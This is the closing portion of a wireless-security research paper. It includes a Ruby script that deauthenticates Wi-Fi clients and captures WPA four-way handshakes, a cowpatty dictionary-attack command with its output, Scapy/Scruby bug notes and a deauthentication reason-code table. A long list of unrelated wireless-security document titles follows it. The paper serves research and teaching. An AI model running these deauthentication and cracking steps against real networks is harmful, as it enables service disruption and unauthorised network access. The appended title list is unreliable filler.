41 and wpa_key_info_install): + [packet] and + [packet] # check for frame 3 elsif ((key_info & wpa_key_info_mic) == wpa_key_info_mic (key_info & wpa_key_info_ack) == wpa_key_info_ack and (key_info & wpa_key_info_install) == puts "found packet 3 for ", sta $tracking[sta]['frame3'] = 1 # store the replay counter for this sta $tracking[sta]['replay_counter'] = replay_counter $tracking[sta]['packets'] = $tracking[sta]['packets'] # check for frame 4 elsif (((key_info & wpa_key_info_mic) == wpa_key_info_mic) ((key_info & wpa_key_info_ack) == 0) and ((key_info & wpa_key_info_install) == 0) and $tracking[sta]['replay_counter'] == replay_counter): puts "Found packet 4 for ", sta $tracking[sta]['frame4'] = 1 $tracking[sta]['packets'] = $tracking[sta]['packets'] if ($tracking[sta]['frame2'] == 1 and $tracking[sta] ['frame3'] == 1 and $tracking[sta]['frame4'] == 1): puts "Handshake Found\n\n" # Write out packets here # wrpcap ("4way.pcap", $tracking[sta]['packets']) handshake_found = 1 exit scruby = ScrubyBasic.new 10.times do puts "Deauth Attack\n" deauth(wifi, packet, 150) puts "Deauth done, sniffing for EAPOL traffic" scruby.sniff(:count=>1000, :timeout=>30, :prn=>"sniffeapol") puts "No handshake found\n\n" Robin Wood 41
42 3. Comments on the Scripts Both scripts are made up from a combination of the deauthenticate attack script and the sniffing script. The only real extra complexity to them is the addition of the code to look into individual fields and even individual bits within fields to check for required values. The fields being investigated are the fields identified in section 5.4, the three bits in the Key Information field, the Key Length field and the Replay Counter. In the earlier pseudo code I suggested repeating indefinitely till the handshake was captured, in these scripts I limit it to 10 repetitions, this can obviously be changed by altering the for loops. Unfortunately, as discussed in Appix A, Scruby has two issues which means the Ruby script will not work exactly as required. The first is because of a bug in Scruby which prevents it from continuing to process fields after a field containing all null bytes is found. As the frames we are looking at can contain a field full of null values before the data we are looking for we may never be able to check the fields we need to. The other issue is Scruby's lack of a function to write out collected packets. Because of this, once the null field bug is fixed the Ruby script will be able to inform you that it has seen a complete handshake but won't be able to actually save it to a file. The work around for this is to have a sniffer running at the same time as the script, the sniffer will collect all the packets so once the script says it has seen a handshake the sniffers logs should contain it. Robin Wood 42
43 4. Running the Scripts The scripts will need customising for your environment but after that can be executed as normal. I would suggest the same set up as was used for the deauthentication attack script so you will be able to see on the client the deauthentication happen and then the reauthentication. 5. What to do with the collected handshake Once the scripts have finished and you have a handshake you can then attempt to crack it. The best tool for this is CoWPAtty by Josh Wright which is available along with instructions for installation and use from It is beyond the scope of this paper to go into using CoWPAtty and actually cracking the PSK but to prove it all works... $ cowpatty f dictionary.txt r 4whs.pcap s hackme cowpatty 4.0 WPA PSK dictionary attack. <[email protected]> Collected all necessary data to mount crack against WPA/PSK passphrase. Starting dictionary attack. Please be patient. The PSK is "crackme" passphrases tested in seconds: passphrases/second 10 Summary There are many different types of wireless tool but most will either sniff, inject or both. The tools presented in this paper are designed as an overview of both sniffing and transmitting data and will hopefully stand as a good base for further research into both areas. Robin Wood 43
44 The tools presented are not optimised or ready for the field, as such they lack easy configurability and have no error checking. It is always ironic when a tool designed to help with a security task itself becomes a target due to poor programming or a simple bug. If you are planning to release any tools based on this paper, please try to avoid these mistakes and thoroughly check any tools before releasing them. All the code in this paper will be available from my website, along with a more field ready version of the python handshake grabber. I have submitted patches to both Scapy and Scruby and hopefully they will be rolled into future releases. I have asked about the addition of a packet writing function in Scruby but that isn't in the current to do list so I may work on that, if I do, any patches will be announced on the Metasploit framework hackers mailing list. If you have questions or have any feedback about any aspect of this paper, please contact me through Robin Wood 44
45 11 References [1] Channel Hopping. Retrieved May 1, 2008, Website [2] Deauthentication reasons. Built from Ethereal source code in file epan/dissectors/packet ieee80211.c. Retrieved 1 May 2008, Website: tar.bz2 [3] IEEE Standard for Information technology Telecommunications and information exchange between systems Local and metropolitan area networks Specific requirements Part 11. Retrieved May 1, 2008, Website [4] Lorcon project homepage. Retrieved May 1, 2008, Website [5] Kismet. Retrieved May 1, 2008, Website [6] Scapy. Retrieved May 1, 2008, Website [7] A definition of Wifi Protected Access from Wikipedia. Retrieved May , Website Fi_Protected_Access [8] A definition of 802.1X from Wikipedia. Retrieved May , Website [9] IEEE Specification for the 802.1X standard. Retrieved May , Website pdf [10] Wikipedia description of i. Retrieved May , Website [11] IEEE Specification for i standard. Retrieved May , Website Robin Wood 45
46 pdf Robin Wood 46
47 Appix A 1. Scapy Issues The current version of Scapy does not have a dissector for WPA EAPOL packets. I have written one and submitted it as a patch and been told that it will be added in the near future. The ticket containing the patch can be found at I have also included both a patched version of Scapy and the patch itself on my site at 2. Scruby Issues There are three issues with the current version of Scruby which affect this project. The first, as with Scapy, it doesn't currently support WPA EAPOL packet dissection. Again, I have written a dissector and submitted it for inclusion and been told it will be added. The second issue is a known bug where Scruby will stop dissecting a packet when it comes across a field containing all null bytes. This has been fixed in a number of places but hasn't yet been fully fixed. This is being worked on and should be solved soon. Without this fix, any fields which appear after a null byte field will not be available. This affects the 4 way handshake grabber tool as the EAPOL packet usually contains a null byte field in the middle, before one of the fields we need to test. The final issue is that unlike Scapy, Scruby can't write pcap files. I've asked the community about adding this functionality and Robin Wood 47
48 have had some good advice so will be looking at writing this in the future. I will discuss a work around for this in the Ruby version of the 4 way handshake grabber. Robin Wood 48
49 Appix B 1. Deauthentication Reason Codes This list of deauthentication reasons has been taken from the list included in Wireshark [2]. Reason Code 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09 0x0A 0x0B 0x0D 0x0E 0x0F 0x10 0x11 0x12 Reason Reserved Unspecified reason Previous authentication no longer valid Deauthenticated because sing STA is leaving (has left) IBSS or ESS Disassociated due to inactivity Disassociated because AP is unable to handle all currently associated stations Class 2 frame received from nonauthenticated station Class 3 frame received from nonassociated station Disassociated because sing STA is leaving (has left) BSS Station requesting (re)association is not authenticated with responding station Disassociated because the information in the Power Capability element is unacceptable Disassociated because the information in the Supported Channels element is unacceptable Invalid Information Element Michael MIC failure 4 Way Handshake timeout Group key update timeout Information element in 4 Way Handshake different from (Re)Association Request/Probe Response/Beacon Group Cipher is not valid Robin Wood 49
50 0x13 0x14 0x15 0x16 0x17 0x18 0x20 0x21 0x22 0x23 0x24 0x25 0x26 0x27 0x2D 0x2E Pairwise Cipher is not valid AKMP is not valid Unsupported RSN IE version Invalid RSN IE Capabilities IEEE 802.1X Authentication failed Cipher suite is rejected per security policy Disassociated for unspecified, QoS related reason Disassociated because QoS AP lacks sufficient bandwidth for this QoS STA Disassociated because of excessive number of frames that need to be acknowledged, but are not acknowledged for AP transmissions and/or poor channel conditions Disassociated because STA is transmitting outside the limits of its TXOPs Requested from peer STA as the STA is leaving the BSS (or resetting) Requested from peer STA as it does not want to use the mechanism Requested from peer STA as the STA received frames using the mechanism for which a set up is required Requested from peer STA due to time out Peer STA does not support the requested cipher suite Association denied due to requesting STA not supporting HT features Robin Wood 50
Wireless LAN Pen-Testing. Part I
Wireless LAN Pen-Testing Part I To know your Enemy, you must become your Enemy (Sun Tzu, 600 BC) Georg Penn 23.03.2012 Motivation Read manuals, documentation, standards Check sources for their reliability,
WiFi Security Assessments
WiFi Security Assessments Robert Dooling Dooling Information Security Defenders (DISD) December, 2009 This work is licensed under a Creative Commons Attribution 3.0 Unported License. Table of Contents
MITM Man in the Middle
MITM Man in the Middle Wifi Packet Capturing and Session Hijacking using Wireshark Introduction The main Objective of this Attack is to make a Fake Access point and send the fake ARP Packets on same Wi-Fi
White paper. Testing for Wi-Fi Protected Access (WPA) in WLAN Access Points. http://www.veryxtech.com
White paper Testing for Wi-Fi Protected Access (WPA) in WLAN Access Points http://www.veryxtech.com White Paper Abstract Background The vulnerabilities spotted in the Wired Equivalent Privacy (WEP) algorithm
CS 356 Lecture 29 Wireless Security. Spring 2013
CS 356 Lecture 29 Wireless Security Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists Chapter
How To Understand The Power Of A Network On A Microsoft Ipa 2.5 (Ipa) 2.2.2 (Ipam) 2-2.5-2 (Networking) 2 (Ipom) 2(2
Workshop Presentation Chapter4 Yosuke TANAKA Agenda(Framing in Detail) Data Frames Control Frames type RTS Duration CTS Addressing (!!important!!) Variation on Data Frame Theme Applied Data Framing ACK
chap18.wireless Network Security
SeoulTech UCS Lab 2015-1 st chap18.wireless Network Security JeongKyu Lee Email: [email protected] Table of Contents 18.1 Wireless Security 18.2 Mobile Device Security 18.3 IEEE 802.11 Wireless
Introduction to WiFi Security. Frank Sweetser WPI Network Operations and Security [email protected]
Introduction to WiFi Security Frank Sweetser WPI Network Operations and Security [email protected] Why should I care? Or, more formally what are the risks? Unauthorized connections Stealing bandwidth Attacks
CS 336/536 Computer Network Security. Summer Term 2010. Wi-Fi Protected Access (WPA) compiled by Anthony Barnard
CS 336/536 Computer Network Security Summer Term 2010 Wi-Fi Protected Access (WPA) compiled by Anthony Barnard 2 Wi-Fi Protected Access (WPA) These notes, intended to follow the previous handout IEEE802.11
Lab Exercise 802.11. Objective. Requirements. Step 1: Fetch a Trace
Lab Exercise 802.11 Objective To explore the physical layer, link layer, and management functions of 802.11. It is widely used to wireless connect mobile devices to the Internet, and covered in 4.4 of
WIRELESS SECURITY. Information Security in Systems & Networks Public Development Program. Sanjay Goel University at Albany, SUNY Fall 2006
WIRELESS SECURITY Information Security in Systems & Networks Public Development Program Sanjay Goel University at Albany, SUNY Fall 2006 1 Wireless LAN Security Learning Objectives Students should be able
Basic processes in IEEE802.11 networks
Module contents IEEE 802.11 Terminology IEEE 802.11 MAC Frames Basic processes in IEEE802.11 networks Configuration parameters.11 Architect. 1 IEEE 802.11 Terminology Station (STA) Architecture: Device
Chapter 6 CDMA/802.11i
Chapter 6 CDMA/802.11i IC322 Fall 2014 Computer Networking: A Top Down Approach 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012 Some material copyright 1996-2012 J.F Kurose and K.W. Ross,
Security+ Guide to Network Security Fundamentals, Third Edition. Chapter 6. Wireless Network Security
Security+ Guide to Network Security Fundamentals, Third Edition Chapter 6 Wireless Network Security Objectives Overview of IEEE 802.11 wireless security Define vulnerabilities of Open System Authentication,
Hole196 Vulnerability in WPA2
Hole196 Vulnerability in WPA2 1 Hole196 Vulnerability in WPA2 Presenters: Anthony Paladino, Managing Director, Systems Engineering Dr. Kaustubh Phanse, Principal Wireless Architect Md. Sohail Ahmad, Senior
Security in IEEE 802.11 WLANs
Security in IEEE 802.11 WLANs 1 IEEE 802.11 Architecture Extended Service Set (ESS) Distribution System LAN Segment AP 3 AP 1 AP 2 MS MS Basic Service Set (BSS) Courtesy: Prashant Krishnamurthy, Univ Pittsburgh
Wireless Pre-Shared Key Cracking (WPA, WPA2)
Wireless Pre-Shared Key Cracking (WPA, WPA2) TABLE OF CONTENTS Introduction... 2 Mechanics Of PSKs And How They Work Demystified... 2 How PSKs Can Be Cracked!... 5 WPA2 PSK Cracking Demonstration.... 6
12/3/08. Security in Wireless LANs and Mobile Networks. Wireless Magnifies Exposure Vulnerability. Mobility Makes it Difficult to Establish Trust
Security in Wireless LANs and Mobile Networks Wireless Magnifies Exposure Vulnerability Information going across the wireless link is exposed to anyone within radio range RF may extend beyond a room or
UNIK4250 Security in Distributed Systems University of Oslo Spring 2012. Part 7 Wireless Network Security
UNIK4250 Security in Distributed Systems University of Oslo Spring 2012 Part 7 Wireless Network Security IEEE 802.11 IEEE 802 committee for LAN standards IEEE 802.11 formed in 1990 s charter to develop
Table of Contents. Cisco Wi Fi Protected Access 2 (WPA 2) Configuration Example
Table of Contents Wi Fi Protected Access 2 (WPA 2) Configuration Example...1 Document ID: 67134...1 Introduction...1 Prerequisites...1 Requirements...1 Components Used...2 Conventions...2 Background Information...2
Wireless Mesh Networks under FreeBSD
Wireless Networks under FreeBSD Rui Paulo [email protected] The FreeBSD Project AsiaBSDCon 2010 - Tokyo, Japan Abstract With the advent of low cost wireless chipsets, wireless mesh networks became much
WEP WPA WPS :: INDEX : Introduction :
WEP WPA WPS With clients Without clients :: INDEX : Introduction > Overview > Terms & Definitions [ Step 1 ] : Configuring the network interface [ Step 2 ] : Collecting the network info [ Step 3 ] : Capturing
SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users.
system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. From a high-level standpoint, attacks on computer systems and networks can be grouped
RF Monitor and its Uses
RF Monitor and its Uses Pradipta De [email protected] Outline RF Monitoring Basics RF Monitoring Installation Using RF Monitoring RF Monitoring on WRT54GS Extending RF Monitoring UDP Lite Comments on
Overview. Summary of Key Findings. Tech Note PCI Wireless Guideline
Overview The following note covers information published in the PCI-DSS Wireless Guideline in July of 2009 by the PCI Wireless Special Interest Group Implementation Team and addresses version 1.2 of the
AirPcap User s Guide. May 2013
AirPcap User s Guide May 2013 2013 Riverbed Technology. All rights reserved. Accelerate, AirPcap, BlockStream, Cascade, Cloud Steelhead, Granite, Interceptor, RiOS, Riverbed, Shark, SkipWare, Steelhead,
Lecture Objectives. Lecture 8 Mobile Networks: Security in Wireless LANs and Mobile Networks. Agenda. References
Lecture Objectives Wireless Networks and Mobile Systems Lecture 8 Mobile Networks: Security in Wireless LANs and Mobile Networks Introduce security vulnerabilities and defenses Describe security functions
CYBER ATTACKS EXPLAINED: PACKET CRAFTING
CYBER ATTACKS EXPLAINED: PACKET CRAFTING Protect your FOSS-based IT infrastructure from packet crafting by learning more about it. In the previous articles in this series, we explored common infrastructure
INTERNATIONAL JOURNAL OF PURE AND APPLIED RESEARCH IN ENGINEERING AND TECHNOLOGY
INTERNATIONAL JOURNAL OF PURE AND APPLIED RESEARCH IN ENGINEERING AND TECHNOLOGY A PATH FOR HORIZING YOUR INNOVATIVE WORK PACKET SNIFFING MS. SONALI A. KARALE 1, MS. PUNAM P. HARKUT 2 HVPM COET Amravati.
Wireless Security: Secure and Public Networks Kory Kirk
Wireless Security: Secure and Public Networks Kory Kirk Villanova University Computer Science [email protected] www.korykirk.com/ Abstract Due to the increasing amount of wireless access points that
Lab Exercise SSL/TLS. Objective. Requirements. Step 1: Capture a Trace
Lab Exercise SSL/TLS Objective To observe SSL/TLS (Secure Sockets Layer / Transport Layer Security) in action. SSL/TLS is used to secure TCP connections, and it is widely used as part of the secure web:
The Wireless Network Road Trip
The Wireless Network Road Trip The Association Process To begin, you need a network. This lecture uses the common logical topology seen in Figure 9-1. As you can see, multiple wireless clients are in
1. discovery phase 2. authentication and association phase 3. EAP/802.1x/RADIUS authentication 4. 4-way handshake 5. group key handshake 6.
1. discovery phase 2. authentication and association phase 3. EAP/802.1x/RADIUS authentication 4. 4-way handshake 5. group key handshake 6. secure data communication. The access point periodically advertise
Wireless Sniffing with Wireshark
ethereal_ch06.qxd 11/8/06 5:07 PM Page 1 Chapter 6 Wireless Sniffing with Wireshark Solutions in this chapter: Techniques for Effective Wireless Sniffing Understanding Wireless Card Operating Modes Configuring
0) What is the wpa handhake?
We have already seen how easy it is with time and the right tools to get the WEP key of any wireless network. We have already explained that these operations are not lawful but for pure interest and personal
S-38.2131/3133 Networking Technology, laboratory course A/B
A! Aalto University School of Electrical Engineering Department of Communications and Networking S-38.2131/3133 Networking Technology, laboratory course A/B Student edition Anni Matinlauri, 3.1.2007 Tuomas
Analysis of Open Source Drivers for IEEE 802.11 WLANs
Preprint of an article that appeared in IEEE conference proceeding of ICWCSC 2010 Analysis of Open Source Drivers for IEEE 802.11 WLANs Vipin M AU-KBC Research Centre MIT campus of Anna University Chennai,
Security Awareness. Wireless Network Security
Security Awareness Wireless Network Security Attacks on Wireless Networks Three-step process Discovering the wireless network Connecting to the network Launching assaults Security Awareness, 3 rd Edition
Section 1 Wireless Packet Captures & Connection Analysis- A Review
Section 1 Wireless Packet Captures & Connection Analysis- A Review Many of you will have already used many of these tools, or at least had some experience with them in previous CWNP or vendor Wireless
NWA1120 Series. User s Guide. Quick Start Guide. Wireless LAN Ceiling Mountable PoE Access Point. Default Login Details
NWA1120 Series Wireless LAN Ceiling Mountable PoE Access Point Version 1.00 Edition 1, 08/2012 Quick Start Guide User s Guide Default Login Details LAN IP Address http://192.168.1.2 User Name admin Passwordwww.zyxel.com
Wireless LAN Security: Securing Your Access Point
IJCSNS International Journal of Computer Science and Network Security, VOL.6 No.5B, May 2006 173 Wireless LAN Security: Securing Your Access Point Sia Sie Tung, Nurul Nadia Ahmad, Tan Kim Geok Faculty
Wi-Fish Finder: Who will bite the bait?
Wi-Fish Finder: Who will bite the bait? There is >50 % chance that your laptop will! Md Sohail Ahmad Prabhash Dhyani AirTight Networks www.airtightnetworks.com About the Speaker Last year brought to you
WEP WPA WPS :: INDEX : Introduction :
WEP WPA WPS With clients Without clients :: INDEX : Introduction > Overview > Terms & Definitions [ Step 1 ] : Configuring the network interface [ Step 2 ] : Collecting the network info [ Step 3 ] : Capturing
A Research Study on Packet Sniffing Tool TCPDUMP
A Research Study on Packet Sniffing Tool TCPDUMP ANSHUL GUPTA SURESH GYAN VIHAR UNIVERSITY, INDIA ABSTRACT Packet sniffer is a technique of monitoring every packet that crosses the network. By using this
Vulnerabilities of Wireless Security protocols (WEP and WPA2)
Vulnerabilities of Wireless Security protocols (WEP and WPA2) Vishal Kumkar, Akhil Tiwari, Pawan Tiwari, Ashish Gupta, Seema Shrawne Abstract - Wirelesses Local Area Networks (WLANs) have become more prevalent
VIDEO Intypedia012en LESSON 12: WI FI NETWORKS SECURITY. AUTHOR: Raúl Siles. Founder and Security Analyst at Taddong
VIDEO Intypedia012en LESSON 12: WI FI NETWORKS SECURITY AUTHOR: Raúl Siles Founder and Security Analyst at Taddong Hello and welcome to Intypedia. Today we will talk about the exciting world of security
802.11 Security (WEP, WPA\WPA2) 19/05/2009. Giulio Rossetti Unipi [email protected]
802.11 Security (WEP, WPA\WPA2) 19/05/2009 Giulio Rossetti Unipi [email protected] 802.11 Security Standard: WEP Wired Equivalent Privacy The packets are encrypted, before sent, with a Secret Key
WIRELESS SECURITY TOOLS
WIRELESS SECURITY TOOLS Johanna Janse van Rensburg, Barry Irwin Rhodes University [email protected], [email protected] (083) 944 3924 Computer Science Department, Hamilton Building, Rhodes University
WLAN Attacks. Wireless LAN Attacks and Protection Tools. (Section 3 contd.) Traffic Analysis. Passive Attacks. War Driving. War Driving contd.
Wireless LAN Attacks and Protection Tools (Section 3 contd.) WLAN Attacks Passive Attack unauthorised party gains access to a network and does not modify any resources on the network Active Attack unauthorised
ECE 4893: Internetwork Security Lab 10: Wireless 802.11 Security
Group Number: Member Names: Date Assigned: March 23, 2004 Date Due: March 30, 2004 Last Revised: March 22, 2004 ECE 4893: Internetwork Security Lab 10: Wireless 802.11 Security Goal: The goal of this lab
Introducing the Adafruit Bluefruit LE Sniffer
Introducing the Adafruit Bluefruit LE Sniffer Created by Kevin Townsend Last updated on 2015-06-25 08:40:07 AM EDT Guide Contents Guide Contents Introduction FTDI Driver Requirements Using the Sniffer
WIRELESS LAN SECURITY (IEEE 802.11b) A Thesis. Submitted to the Department of Computer Science and Engineering. BRAC University.
WIRELESS LAN SECURITY (IEEE 802.11b) A Thesis Submitted to the Department of Computer Science and Engineering of BRAC University By Iftheker Mohammad Student ID: 03201076 & Mohammad Ashik Elahi Student
Wireless Network Security. Pat Wilbur Wireless Networks March 30, 2007
Wireless Network Security Pat Wilbur Wireless Networks March 30, 2007 Types of Attacks Intrusion gain unauthorized access to a network in order to use the network or Internet connection Types of Attacks
802.11. Markku Renfors. Partly based on student presentation by: Lukasz Kondrad Tomasz Augustynowicz Jaroslaw Lacki Jakub Jakubiak
802.11 Markku Renfors Partly based on student presentation by: Lukasz Kondrad Tomasz Augustynowicz Jaroslaw Lacki Jakub Jakubiak Contents 802.11 Overview & Architecture 802.11 MAC 802.11 Overview and Architecture
Introduction to Wireshark Network Analysis
Introduction to Wireshark Network Analysis Page 2 of 24 Table of Contents INTRODUCTION 4 Overview 4 CAPTURING LIVE DATA 5 Preface 6 Capture Interfaces 6 Capture Options 6 Performing the Capture 8 ANALYZING
Lab VI Capturing and monitoring the network traffic
Lab VI Capturing and monitoring the network traffic 1. Goals To gain general knowledge about the network analyzers and to understand their utility To learn how to use network traffic analyzer tools (Wireshark)
Lab Module 3 Network Protocol Analysis with Wireshark
Pacific Northwest National Laboratory Lab Module 3 Network Protocol Analysis with Wireshark NATO ASI on Energy Infrastructure Security October 2015 PNNL-##### Lab Module 3 Network Protocol Analysis with
Nokia E61i Configuring connection settings
Nokia E61i Configuring connection settings Nokia E61i Configuring connection settings Legal Notice Copyright Nokia 2007. All rights reserved. Reproduction, transfer, distribution or storage of part or
Figure 1. Wireshark Menu Bar
Packet Capture In this article, we shall cover the basic working of a sniffer, to capture packets for analyzing the traffic. If an analyst does not have working skills of a packet sniffer to a certain
WLAN 802.11w Technology
Technical white paper WLAN 80.w Technology Table of contents Overview... Technical background... Benefits... 80.w technology implementation... Management Frame Protection negotiation... Protected management
Configuring connection settings
Configuring connection settings Nokia E90 Communicator Configuring connection settings Nokia E90 Communicator Configuring connection settings Legal Notice Nokia, Nokia Connecting People, Eseries and E90
Chapter 3 Safeguarding Your Network
Chapter 3 Safeguarding Your Network The RangeMax NEXT Wireless Router WNR834B provides highly effective security features which are covered in detail in this chapter. This chapter includes: Choosing Appropriate
Nokia and Nokia Connecting People are registered trademarks of Nokia Corporation
Nokia and Nokia Connecting People are registered trademarks of Nokia Corporation Nokia E70 Configuring connection settings Nokia E70 Configuring connection settings Legal Notice Copyright Nokia 2006. All
How To Secure Wireless Networks
Lecture 24 Wireless Network Security modified from slides of Lawrie Brown Wireless Security Overview concerns for wireless security are similar to those found in a wired environment security requirements
WLAN Access Security Technical White Paper. Issue 02. Date 2012-09-24 HUAWEI TECHNOLOGIES CO., LTD.
WLAN Access Security Technical White Paper Issue 02 Date 2012-09-24 HUAWEI TECHNOLOGIES CO., LTD. . 2012. All rights reserved. No part of this document may be reproduced or transmitted in any form or by
Symm ym e m t e r t ic i c cr c yptogr ypt aphy a Ex: RC4, AES 2
Wi-Fi Security FEUP>MIEIC>Mobile Communications Jaime Dias Symmetric cryptography Ex: RC4, AES 2 Digest (hash) Cryptography Input: variable length message Output: a fixed-length bit
Wireless security. Any station within range of the RF receives data Two security mechanism
802.11 Security Wireless security Any station within range of the RF receives data Two security mechanism A means to decide who or what can use a WLAN authentication A means to provide privacy for the
Journal of Mobile, Embedded and Distributed Systems, vol. I, no. 1, 2009 ISSN 2067 4074
Issues in WiFi Networks Nicolae TOMAI Faculty of Economic Informatics Department of IT&C Technologies Babes Bolyai Cluj-Napoca University, Romania [email protected] Abstract: The paper has four sections.
Chapter 2 Wireless Networking Basics
Chapter 2 Wireless Networking Basics Wireless Networking Overview Some NETGEAR products conform to the Institute of Electrical and Electronics Engineers (IEEE) 802.11g standard for wireless LANs (WLANs).
WRE2205. User s Guide. Quick Start Guide. Wireless N300 Range Extender. Default Login Details. Version 1.00 Edition 1, 06/2012
WRE2205 Wireless N300 Range Extender Version 1.00 Edition 1, 06/2012 Quick Start Guide User s Guide Default Login Details LAN IP Address http://192.168.1.2 User Name admin Passwordwww.zyxel.com 1234 Copyright
Python Scripting with Scapy
Copyright: The development of this document is funded by Higher Education of Academy. Permission is granted to copy, distribute and /or modify this document under a license compliant with the Creative
Hacking. Aims. Naming, Acronyms, etc. Sources
Free Technology Workshop Hacking Hands on with wireless LAN routers, packet capture and wireless security Organised by Steven Gordon Bangkadi 3 rd floor IT Lab 10:30-13:30 Friday 18 July 2014 http://ict.siit.tu.ac.th/moodle/.-----.-----.-----..----.
Methodology: Security plan for wireless networks. By: Stephen Blair Mandeville A. Summary
Methodology: Security plan for wireless networks By: Stephen Blair Mandeville A. Summary The evolution to wireless networks allows connections with the same quality of data transfer at a lower cost but
How To Classify A Dnet Attack
Analysis of Computer Network Attacks Nenad Stojanovski 1, Marjan Gusev 2 1 Bul. AVNOJ 88-1/6, 1000 Skopje, Macedonia [email protected] 2 Faculty of Natural Sciences and Mathematics, Ss. Cyril
WEP Overview 1/2. and encryption mechanisms Now deprecated. Shared key Open key (the client will authenticate always) Shared key authentication
WLAN Security WEP Overview 1/2 WEP, Wired Equivalent Privacy Introduced in 1999 to provide confidentiality, authentication and integrity Includes weak authentication Shared key Open key (the client will
Security in Ad Hoc Network
Security in Ad Hoc Network Bingwen He Joakim Hägglund Qing Gu Abstract Security in wireless network is becoming more and more important while the using of mobile equipments such as cellular phones or laptops
Recommended 802.11 Wireless Local Area Network Architecture
NATIONAL SECURITY AGENCY Ft. George G. Meade, MD I332-008R-2005 Dated: 23 September 2005 Network Hardware Analysis and Evaluation Division Systems and Network Attack Center Recommended 802.11 Wireless
Configuring Security Solutions
CHAPTER 3 This chapter describes security solutions for wireless LANs. It contains these sections: Cisco Wireless LAN Solution Security, page 3-2 Using WCS to Convert a Cisco Wireless LAN Solution from
9 Simple steps to secure your Wi-Fi Network.
9 Simple steps to secure your Wi-Fi Network. Step 1: Change the Default Password of Modem / Router After opening modem page click on management - access control password. Select username, confirm old password
Implementing Security for Wireless Networks
Implementing Security for Wireless Networks Action Items for this session Learn something! Take notes! Fill out that evaluation. I love to see your comments and we want to make these better! Most important:
Session Hijacking Exploiting TCP, UDP and HTTP Sessions
Session Hijacking Exploiting TCP, UDP and HTTP Sessions Shray Kapoor [email protected] Preface With the emerging fields in e-commerce, financial and identity information are at a higher risk of being
Wireless Networks. Welcome to Wireless
Wireless Networks 11/1/2010 Wireless Networks 1 Welcome to Wireless Radio waves No need to be physically plugged into the network Remote access Coverage Personal Area Network (PAN) Local Area Network (LAN)
Self Help Guide IMPORTANT! Securing Your Wireless Network. This Guide refers to the following Products: Please read the following carefully; Synopsis:
IMPORTANT! This Guide refers to the following Products: Securing Your Wireless Network Please read the following carefully; Synopsis: This Guide is designed to help you if you have a Wireless Network that
Information Security Training. Assignment 1 Networking
Information Security Training Assignment 1 Networking By Justin C. Klein Keane September 28, 2012 Assignment 1 For this assignment you will utilize several networking utilities
PwC. Outline. The case for wireless networking. Access points and network cards. Introduction: OSI layers and 802 structure
PwC Outline Wireless LAN Security: Attacks and Countermeasures 1. Introduction 2. Problems with 802.11 security 3. Attacks on and risks to Wireless Networks 4. Defending wireless networks ISACA Hong Kong
Wifi Web Server Module w TF Socket User s Guide
Wifi Web Server Module w TF Socket User s Guide 2004-2010 Sure Electronics Inc. MB-CM14117_Ver1.0 WIFI WEB SERVER MODULE W TF SOCKET USER S GUIDE Table of Contents Chapter 1. Overview...1 1.1 Overview...
OpenWIPS-ng A modular and Open source WIPS. Thomas d Otreppe, Author of Aircrack-ng
OpenWIPS-ng A modular and Open source WIPS Thomas d Otreppe, Author of Aircrack-ng 1 Agenda What is OpenWIPS-ng? Origin Architecture Internal design Release plan Demo ~# whoami Author of Aircrack-ng and
LevelOne WAP - 0005. User s Manual. 108 Mbps Wireless Access Point
LevelOne WAP - 0005 108 Mbps Wireless Access Point User s Manual TABLE OF CONTENTS CHAPTER 1 INTRODUCTION... 1 Features of your Wireless Access Point... 1 Package Contents... 3 Physical Details... 3 CHAPTER
Lab Exercise SSL/TLS. Objective. Step 1: Open a Trace. Step 2: Inspect the Trace
Lab Exercise SSL/TLS Objective To observe SSL/TLS (Secure Sockets Layer / Transport Layer Security) in action. SSL/TLS is used to secure TCP connections, and it is widely used as part of the secure web:
An Experimental Study Analysis of Security Attacks at IEEE 802.11 Wireless Local Area Network
, pp. 9-18 http://dx.doi.org/10.14257/ijfgcn.2015.8.1.02 An Experimental Study Analysis of Security Attacks at IEEE 802.11 Wireless Local Area Network 1 Md Waliullah, 2 A B M Moniruzzaman and 3 Md. Sadekur
Securing end devices
Securing end devices Securing the network edge is already covered. Infrastructure devices in the LAN Workstations Servers IP phones Access points Storage area networking (SAN) devices. Endpoint Security
WLAN Authentication and Data Privacy
WLAN Authentication and Data Privacy Digi Wi-Point 3G supports various Wi-Fi security options, including WEP-40/WEP-104 and WPA- PSK and WPA2-PSK. To configure WLAN security on DIGI WI-POINT 3G, you may
Wiereless LAN 802.11
Tomasz Kurzawa Wiereless LAN 802.11 Introduction The 802.11 Architecture Channels and Associations The 802.11 MAC Protocol The 802.11 Frame Introduction Wireless LANs are most important access networks
visual packet analysis
visual packet analysis Eye P.A. by MetaGeek USER GUIDE page 1 Eye P.A. visual packet analysis SYSTEM REQUIREMENTS INSTALLATION DIRECT CAPTURE COMPATIBLE FILE FORMATS MAIN VIEWS Work Flow Filter Bar Multi-Layered
